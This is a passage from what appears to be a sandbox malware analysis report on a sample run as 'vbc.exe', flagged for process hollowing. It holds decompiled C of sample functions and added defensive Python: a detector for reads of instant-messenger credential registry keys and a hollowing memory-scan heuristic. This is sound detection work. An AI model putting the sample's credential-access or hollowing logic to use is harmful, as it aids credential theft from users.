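    """
    hits = []
    for ev in events:
        key = ev.get("key", "")
        low = key.lower().rstrip("\\")
        if any(low.endswith(s) or (s + "\\") in low for s in WATCHED_SUFFIXES):
            hits.append((ev.get("process", "?"), key))
    return hits


# Constructed sample events, not taken from the report.
SAMPLE_EVENTS = [
    {"process": r"C:\Users\u\AppData\Local\Temp\vbc.exe",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\MSNMessenger"},
    {"process": r"C:\Users\u\AppData\Local\Temp\vbc.exe",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\MessengerService\ListCache\Contacts"},
    {"process": r"C:\Windows\explorer.exe",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"},
]

if __name__ == "__main__":
    print(decode_regopen(0x80000001, r"Software\Microsoft\MSNMessenger", 0x20019))
    for proc, key in find_im_credential_access(SAMPLE_EVENTS):
        print(f"IM credential key touched: {proc} -> {key}")
```

Decoding 0x20019 gives exactly KEY_READ, so the sample opens both keys read-only; a detection that only watches registry writes (as Sysmon's registry events do) will not see this access, which is why the matcher keys on the path and is meant to be fed from object-access auditing or an API trace.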

Control-flow Graph (basic blocks and edges of E0040ED0B; the Executed / Not Executed colouring of the rendered graph is not preserved in text)

• 439: 40ed0b-40ed22 FindResourceA -> 440, 441
• 440: 40ed24-40ed33 SizeofResource -> 442, 443
• 441: 40ed89-40ed8e
• 442: 40ed35-40ed41 LoadResource -> 443, 444
• 443: 40ed88 -> 441
• 444: 40ed43-40ed4c LockResource -> 443, 445
• 445: 40ed4e-40ed5c -> 446, 447
• 446: 40ed7a-40ed83 -> 443
• 447: 40ed5e -> 448
• 448: 40ed5f-40ed77 -> 448 (self-loop), 449
• 449: 40ed79 -> 446
C-Code - Quality: 100%
	// Locates resource _a12 (name) of type _a8 in module _a4, maps it and folds its
	// contents into a global at 0x417110. Returns 1 on every path, so the caller
	// cannot tell a missing resource from a processed one.
	E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
		struct HRSRC__* _t12;
		void* _t16;
		void* _t17;
		signed int _t26;
		signed int _t29;
		signed int _t33;
		struct HRSRC__* _t35;
		signed int _t36;

		_t12 = FindResourceA(_a4, _a12, _a8); // executed; arguments: hModule, lpName, lpType
		_t35 = _t12;
		if(_t35 != 0) {
			_t33 = SizeofResource(_a4, _t35);
			if(_t33 > 0) {
				_t16 = LoadResource(_a4, _t35);
				if(_t16 != 0) {
					_t17 = LockResource(_t16); // _t17: pointer to the raw resource bytes
					if(_t17 != 0) {
						_a4 = _t33;
						_t29 = _t33 * _t33; // accumulator seeded with size * size
						_t36 = 0;
						_t7 =  &_a4;
						 *_t7 = _a4 >> 2; // loop count = size / 4 DWORDs; trailing bytes are ignored
						if( *_t7 != 0) {
							do {
								// (dword * i * size * 0x11) ^ (dword + previous); '+' binds tighter than '^'
								_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
								_t36 = _t36 + 1;
								_t29 = _t26;
							} while (_t36 < _a4);
						}
						// (global + accumulator) ^ size, stored back to 0x417110; its consumer is not in this listing
						 *0x417110 =  *0x417110 + _t29 ^ _t33;
					}
				}
			}
		}
		return 1;
	}

(instruction address column for the listing above, one entry per C statement: 0x0040ed18 .. 0x0040ed8e)

                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                    • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                                                                                    • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                                                                                                    • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                                                                                    • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
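The loop in E0040ED0B above folds the mapped resource into a 32-bit value and merges it into a global at 0x417110. To reproduce that value from a resource blob offline, here is the editor's Python re-implementation (an added example, not code from the report or the sample). It mirrors the decompiled arithmetic with 32-bit wrap-around; the initial contents of the global are not known from the listing, so they are passed in as `global_in`, and the sample resource is a constructed two-DWORD blob.

```python
# Added example (editor's re-implementation, not code from the Joe Sandbox
# report or from the sample): the resource checksum computed by E0040ED0B, so an
# analyst can reproduce the value that the function stores for a given resource.
# All arithmetic is 32-bit wrap-around as in the x86 original. The initial value
# of the global at 0x417110 is not visible in the listing and is passed in.

MASK32 = 0xFFFFFFFF


def resource_checksum(data: bytes) -> int:
    """Fold `data` exactly as the do/while loop in E0040ED0B does.

    Mirrors:
        _t29 = size * size
        for each DWORD v at index i (i < size >> 2):
            _t29 = (v * i * size * 0x11) ^ (v + _t29)
    Only size >> 2 little-endian DWORDs are read; trailing bytes are ignored,
    and a resource shorter than 4 bytes leaves the accumulator at size * size.
    """
    size = len(data)
    acc = (size * size) & MASK32
    for i in range(size >> 2):
        v = int.from_bytes(data[4 * i:4 * i + 4], "little")
        acc = ((v * i * size * 0x11) & MASK32) ^ ((v + acc) & MASK32)
    return acc


def update_global(global_in: int, data: bytes) -> int:
    """Apply the final store: *0x417110 = (*0x417110 + _t29) ^ size.

    In C, '+' binds tighter than '^', so the addition happens first. The
    original skips the whole block when SizeofResource returns 0 (or when any
    of the resource APIs fails), leaving the global unchanged; an empty blob
    models that case here.
    """
    size = len(data)
    if size == 0:
        return global_in & MASK32
    return ((global_in + resource_checksum(data)) & MASK32) ^ size


# Constructed sample resource: two little-endian DWORDs, 1 and 2.
SAMPLE_RESOURCE = (1).to_bytes(4, "little") + (2).to_bytes(4, "little")

if __name__ == "__main__":
    print(hex(resource_checksum(SAMPLE_RESOURCE)))  # 0x153
    print(hex(update_global(0, SAMPLE_RESOURCE)))   # 0x15b
```

Because the loop multiplies each DWORD by its index, the first DWORD contributes only through the `v + acc` term, and the global is never cleared before the add, so the stored value depends on whatever the global held when the function ran; anyone reproducing it from a dumped image needs that prior value as well as the resource bytes.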

C-Code - Quality: 95%
	// INI accessor: with _a4 == 0 it reads key _a12 of section _a8 from file _a20 into
	// an 8 KiB stack buffer and hands the text to E004067DC; otherwise it formats a
	// value with E00406763 and writes it back with WritePrivateProfileStringA.
	E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
		void _v8199;
		char _v8200;
		void* __ebx;
		int _t23;
		CHAR* _t31;

		E004118A0(0x2004, __ecx); // stack probe for the 0x2004-byte frame (assumed from the argument; helper not shown)
		_v8200 = 0;
		if(_a4 == 0) {
			memset( &_v8199, 0, 0x2000); // zero the remainder of the buffer
			// lpAppName=_a8, lpKeyName=_a12, lpDefault=0x412466, lpReturnedString=&_v8200, nSize=0x2000, lpFileName=_a20
			GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
			_t23 = E004067DC( &_v8200, __edi, _a16);
		} else {
			memset( &_v8199, 0, 0x2000);
			_t31 =  &_v8200;
			E00406763(_t31, _a16,  *__edi); // sprintf/memcpy per the APIs list: format the value into the buffer
			_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
		}
		return _t23;
	}

(instruction address column for the listing above, one entry per C statement: 0x0040ea7a .. 0x0040eb0d)

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040EA9A
                                                                                                                                                      • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                                                                                                      • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                                                                                                    • memset.MSVCRT ref: 0040EAD5
                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                    • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                                                                                    • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                                                                                                    • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                                                                                    • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
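The memory-dump record above names a region at base 0x00400000 in process 15 (vbc) that the plugin marks "based on PE: true"; read together with the "Sample uses process hollowing technique" signature in the overview, that is the footprint of a PE written over a suspended host's image base. Assuming the 00000040 and 00020000 fields of the .sdmp name encode the region protection (PAGE_EXECUTE_READWRITE) and type (MEM_PRIVATE), which is my reading of the naming convention rather than something the report states, the following added example (not part of the Joe Sandbox report) shows the check a memory scanner would run over VirtualQuery-style region records: flag executable regions that are not image-backed yet start with a PE header. The region list is constructed to mirror that dump.

```python
# Added example, not from the Joe Sandbox report: a process-hollowing heuristic
# over VirtualQuery-style region records. The 0x400000 region is constructed to
# mirror the dumped one (executable, private, PE header present). Reading the
# .sdmp filename fields as protection/type values is an assumption.
from dataclasses import dataclass
from typing import List

# MEMORY_BASIC_INFORMATION.Protect values (winnt.h)
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_READWRITE = 0x04
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# MEMORY_BASIC_INFORMATION.Type values (winnt.h)
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000


@dataclass
class Region:
    base: int
    size: int
    protect: int
    type: int
    head: bytes  # leading bytes of the region, as a scanner would read them


def looks_like_pe(head: bytes) -> bool:
    """True if the bytes carry an MZ stub whose e_lfanew points at a PE signature."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
    if e_lfanew + 4 > len(head):
        return False
    return head[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def is_hollowing_candidate(r: Region) -> bool:
    """Executable, not backed by an image section, and carrying a PE header:
    the pattern a hollowed process shows at its overwritten image base.
    A legitimately loaded module is MEM_IMAGE, so it never matches."""
    executable = bool(r.protect & EXEC_MASK)
    return executable and r.type != MEM_IMAGE and looks_like_pe(r.head)


def find_candidates(regions: List[Region]) -> List[int]:
    """Base addresses of every region that matches the heuristic."""
    return [r.base for r in regions if is_hollowing_candidate(r)]


def make_pe_head() -> bytes:
    """Minimal MZ header with e_lfanew = 0x40 followed by 'PE\\0\\0' (constructed)."""
    mz = b"MZ" + b"\0" * 0x3A                       # 0x3C bytes of DOS stub
    mz += (0x40).to_bytes(4, "little")              # e_lfanew at offset 0x3C
    return mz + b"PE\0\0"                           # PE signature at 0x40


# Constructed regions: the RWX private region at 0x400000 modelled on the dump,
# an image-backed system DLL, a heap, and an RWX private region without a PE
# header (shellcode or JIT; a different rule would cover that one).
SAMPLE_REGIONS = [
    Region(0x00400000, 0x18000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, make_pe_head()),
    Region(0x77000000, 0x100000, PAGE_EXECUTE_READ, MEM_IMAGE, make_pe_head()),
    Region(0x00600000, 0x10000, PAGE_READWRITE, MEM_PRIVATE, b"\0" * 0x44),
    Region(0x00700000, 0x1000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, b"\xcc" * 0x44),
]

if __name__ == "__main__":
    for base in find_candidates(SAMPLE_REGIONS):
        print(f"hollowing candidate at {base:#010x}")
```

On a live system the same three fields come from VirtualQueryEx and the first page from ReadProcessMemory; the type check is what keeps legitimately loaded modules out of the result, so it should not be dropped to "RWX anywhere", which also fires on every JIT.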

                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                     			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
                                                                                                                                                     				void* __edi;
                                                                                                                                                     				void* __esi;
                                                                                                                                                     				intOrPtr _t14;
                                                                                                                                                     				intOrPtr _t15;
                                                                                                                                                     				void* _t16;
                                                                                                                                                     				void* _t17;
                                                                                                                                                     				struct HICON__* _t19;
                                                                                                                                                     				intOrPtr* _t23;
                                                                                                                                                     				void* _t25;
                                                                                                                                                     				intOrPtr _t32; // used below but not declared in the decompiler output
                                                                                                                                                     
                                                                                                                                                     				// Object initialisation routine: __ebx is the object (this), __eax an incoming value.
                                                                                                                                                     				_t23 = __ebx;
                                                                                                                                                     				_t14 = __eax;
                                                                                                                                                     				 *((intOrPtr*)(__ebx + 0x124)) = 0;
                                                                                                                                                     				 *__ebx = 0x41356c; // first dword of the object set to a fixed address, most likely a vftable pointer (inferred)
                                                                                                                                                     				 *((intOrPtr*)(__ebx + 0x258)) = 0;
                                                                                                                                                     				_push(0x14);
                                                                                                                                                     				 *((intOrPtr*)(__ebx + 0x374)) = 0;
                                                                                                                                                     				L004115D0(); // operator new (??2@ in the API ID below), 0x14-byte request
                                                                                                                                                     				if(__eax == 0) {
                                                                                                                                                     					_t14 = 0;
                                                                                                                                                     					__eflags = 0;
                                                                                                                                                     				} else {
                                                                                                                                                     					 *0x417114 = __eax; // allocation also kept in a global
                                                                                                                                                     				}
                                                                                                                                                     				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
                                                                                                                                                     				L004115D0(); // executed; second operator new, size argument not recovered here
                                                                                                                                                     				_t32 = _t14;
                                                                                                                                                     				_t25 = 0xf38;
                                                                                                                                                     				if(_t14 == 0) {
                                                                                                                                                     					_t15 = 0;
                                                                                                                                                     					__eflags = 0;
                                                                                                                                                     				} else {
                                                                                                                                                     					_t15 = E00404016(_t14, _t32);
                                                                                                                                                     				}
                                                                                                                                                     				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
                                                                                                                                                     				 *((intOrPtr*)(_t23 + 0x378)) = 0;
                                                                                                                                                     				 *((intOrPtr*)(_t23 + 0x260)) = 0;
                                                                                                                                                     				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
                                                                                                                                                     				 *((intOrPtr*)(_t23 + 0x154)) = 0;
                                                                                                                                                     				_t16 =  *(_t23 + 0x258);
                                                                                                                                                     				if(_t16 != 0) {
                                                                                                                                                     					DeleteObject(_t16); // release any GDI object already held at +0x258
                                                                                                                                                     					 *(_t23 + 0x258) = 0;
                                                                                                                                                     				}
                                                                                                                                                     				_t17 = E00406252(); // executed; supplies the new GDI object stored at +0x258
                                                                                                                                                     				 *(_t23 + 0x258) = _t17;
                                                                                                                                                     				E00401000(_t25, _t23 + 0x158, 0x413480);
                                                                                                                                                     				_t19 = LoadIconA( *0x416b94, 0x65); // executed; icon resource 101 from the module handle kept at 0x416b94
                                                                                                                                                     				E004017A4(_t23, _t19);
                                                                                                                                                     				return _t23;
                                                                                                                                                     			}












                                                                                                                                                    0x0040b785
                                                                                                                                                    0x0040b785
                                                                                                                                                    0x0040b789
                                                                                                                                                    0x0040b78f
                                                                                                                                                    0x0040b795
                                                                                                                                                    0x0040b79b
                                                                                                                                                    0x0040b79d
                                                                                                                                                    0x0040b7a3
                                                                                                                                                    0x0040b7ab
                                                                                                                                                    0x0040b7b4
                                                                                                                                                    0x0040b7b4
                                                                                                                                                    0x0040b7ad
                                                                                                                                                    0x0040b7ad
                                                                                                                                                    0x0040b7ad
                                                                                                                                                    0x0040b7bb
                                                                                                                                                    0x0040b7c1
                                                                                                                                                    0x0040b7c6
                                                                                                                                                    0x0040b7c8
                                                                                                                                                    0x0040b7c9
                                                                                                                                                    0x0040b7d4
                                                                                                                                                    0x0040b7d4
                                                                                                                                                    0x0040b7cb
                                                                                                                                                    0x0040b7cd
                                                                                                                                                    0x0040b7cd
                                                                                                                                                    0x0040b7d6
                                                                                                                                                    0x0040b7dc
                                                                                                                                                    0x0040b7e2
                                                                                                                                                    0x0040b7e8
                                                                                                                                                    0x0040b7ee
                                                                                                                                                    0x0040b7f4
                                                                                                                                                    0x0040b7fc
                                                                                                                                                    0x0040b7ff
                                                                                                                                                    0x0040b805
                                                                                                                                                    0x0040b805
                                                                                                                                                    0x0040b80b
                                                                                                                                                    0x0040b81b
                                                                                                                                                    0x0040b821
                                                                                                                                                    0x0040b82e
                                                                                                                                                    0x0040b837
                                                                                                                                                    0x0040b840

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1986663749-0
                                                                                                                                                    • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                                                                                    • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                                                                                                    • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                                                                                    • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                     			E00411932() {
                                                                                                                                                     				intOrPtr _t1;
                                                                                                                                                     				intOrPtr _t2;
                                                                                                                                                     				intOrPtr _t3;
                                                                                                                                                     				intOrPtr _t4;
                                                                                                                                                     
                                                                                                                                                     				// Cleanup routine: each of four global pointers is passed to operator delete
                                                                                                                                                     				// (??3@ in the API ID below) when non-null. The globals are not cleared afterwards.
                                                                                                                                                     				_t1 =  *0x417528;
                                                                                                                                                     				if(_t1 != 0) {
                                                                                                                                                     					_push(_t1);
                                                                                                                                                     					L004115D6(); // operator delete
                                                                                                                                                     				}
                                                                                                                                                     				_t2 =  *0x417530;
                                                                                                                                                     				if(_t2 != 0) {
                                                                                                                                                     					_push(_t2); // executed
                                                                                                                                                     					L004115D6(); // executed
                                                                                                                                                     				}
                                                                                                                                                     				_t3 =  *0x41752c;
                                                                                                                                                     				if(_t3 != 0) {
                                                                                                                                                     					_push(_t3);
                                                                                                                                                     					L004115D6();
                                                                                                                                                     				}
                                                                                                                                                     				_t4 =  *0x417534;
                                                                                                                                                     				if(_t4 != 0) {
                                                                                                                                                     					_push(_t4); // executed
                                                                                                                                                     					L004115D6(); // executed
                                                                                                                                                     					return _t4;
                                                                                                                                                     				}
                                                                                                                                                     				return _t4;
                                                                                                                                                     			}







                                                                                                                                                    0x00411932
                                                                                                                                                    0x00411939
                                                                                                                                                    0x0041193b
                                                                                                                                                    0x0041193c
                                                                                                                                                    0x00411941
                                                                                                                                                    0x00411942
                                                                                                                                                    0x00411949
                                                                                                                                                    0x0041194b
                                                                                                                                                    0x0041194c
                                                                                                                                                    0x00411951
                                                                                                                                                    0x00411952
                                                                                                                                                    0x00411959
                                                                                                                                                    0x0041195b
                                                                                                                                                    0x0041195c
                                                                                                                                                    0x00411961
                                                                                                                                                    0x00411962
                                                                                                                                                    0x00411969
                                                                                                                                                    0x0041196b
                                                                                                                                                    0x0041196c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00411971
                                                                                                                                                    0x00411972

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                                                                                    • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                                                                                                    • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                                                                                    • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E0040787D() {
                                                                                                                                                    				void* _t13;
                                                                                                                                                    				signed int _t16;
                                                                                                                                                    				signed int _t18;
                                                                                                                                                    				signed int _t27;
                                                                                                                                                    				signed int _t29;
                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                    
                                                                                                                                                    				_t33 =  *0x417540;
                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                    					_push(0x8000);
                                                                                                                                                    					 *0x417540 = 0x8000;
                                                                                                                                                    					 *0x417544 = 0x100;
                                                                                                                                                    					 *0x417548 = 0x1000; // executed
                                                                                                                                                    					L004115D0(); // executed
                                                                                                                                                    					 *0x417528 = 0x8000;
                                                                                                                                                    					_t27 = 4;
                                                                                                                                                    					_t16 =  *0x417544 * _t27;
                                                                                                                                                    					_push( ~(0 | _t33 > 0x00000000) | _t16);
                                                                                                                                                    					L004115D0();
                                                                                                                                                    					 *0x417530 = _t16;
                                                                                                                                                    					_t29 = 4;
                                                                                                                                                    					_t18 =  *0x417544 * _t29;
                                                                                                                                                    					_push( ~(0 | _t33 > 0x00000000) | _t18);
                                                                                                                                                    					L004115D0();
                                                                                                                                                    					_push( *0x417548);
                                                                                                                                                    					 *0x417534 = _t18; // executed
                                                                                                                                                    					L004115D0(); // executed
                                                                                                                                                    					 *0x41752c = _t18;
                                                                                                                                                    					return _t18;
                                                                                                                                                    				}
                                                                                                                                                    				return _t13;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                    • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                                                                                    • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                                                                                                    • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                                                                                    • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                                                                                                                                    				void* _t8;
                                                                                                                                                    				void* _t13;
                                                                                                                                                    				signed int _t16;
                                                                                                                                                    				void** _t21;
                                                                                                                                                    				signed int _t22;
                                                                                                                                                    
                                                                                                                                                    				_t21 = __edi;
                                                                                                                                                    				_t22 =  *__eax;
                                                                                                                                                    				if(__edx < _t22) {
                                                                                                                                                    					return 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t13 =  *__edi;
                                                                                                                                                    					do {
                                                                                                                                                    						 *__eax =  *__eax + _a8;
                                                                                                                                                    						_t16 =  *__eax;
                                                                                                                                                    					} while (__edx >= _t16);
                                                                                                                                                    					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                                                    					 *__edi = _t8;
                                                                                                                                                    					if(_t22 > 0) {
                                                                                                                                                    						if(_t8 != 0) {
                                                                                                                                                    							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                                                    						}
                                                                                                                                                    						free(_t13);
                                                                                                                                                    					}
                                                                                                                                                    					return 0 |  *_t21 != 0x00000000;
                                                                                                                                                    				}
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • malloc.MSVCRT ref: 00406116
                                                                                                                                                    • memcpy.MSVCRT ref: 0040612E
                                                                                                                                                    • free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                    • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                                                                                    • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                                                                                                    • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                                                                                    • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E0040B8D7(void* __edi, void* __eflags) {
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t24;
                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                    				void* _t42;
                                                                                                                                                    				void* _t45;
                                                                                                                                                    				void* _t49;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                    
                                                                                                                                                    				_t54 = __eflags;
                                                                                                                                                    				_t49 = __edi;
                                                                                                                                                    				_t38 = 0;
                                                                                                                                                    				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
                                                                                                                                                    				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                                                                                                                                    				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
                                                                                                                                                    				_t24 =  *((intOrPtr*)(__edi + 0x37c));
                                                                                                                                                    				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
                                                                                                                                                    					_t51 = 0x412466;
                                                                                                                                                    				} else {
                                                                                                                                                    					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
                                                                                                                                                    						_t45 = 0;
                                                                                                                                                    						__eflags = 0;
                                                                                                                                                    					} else {
            _t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
        }
        _t51 = _t45;
    }
    _push(_t51);
    _push("/stext");
    L004115B2();
    if(_t24 != 0) {
        _t52 = E0040B841(_t24, _t51);
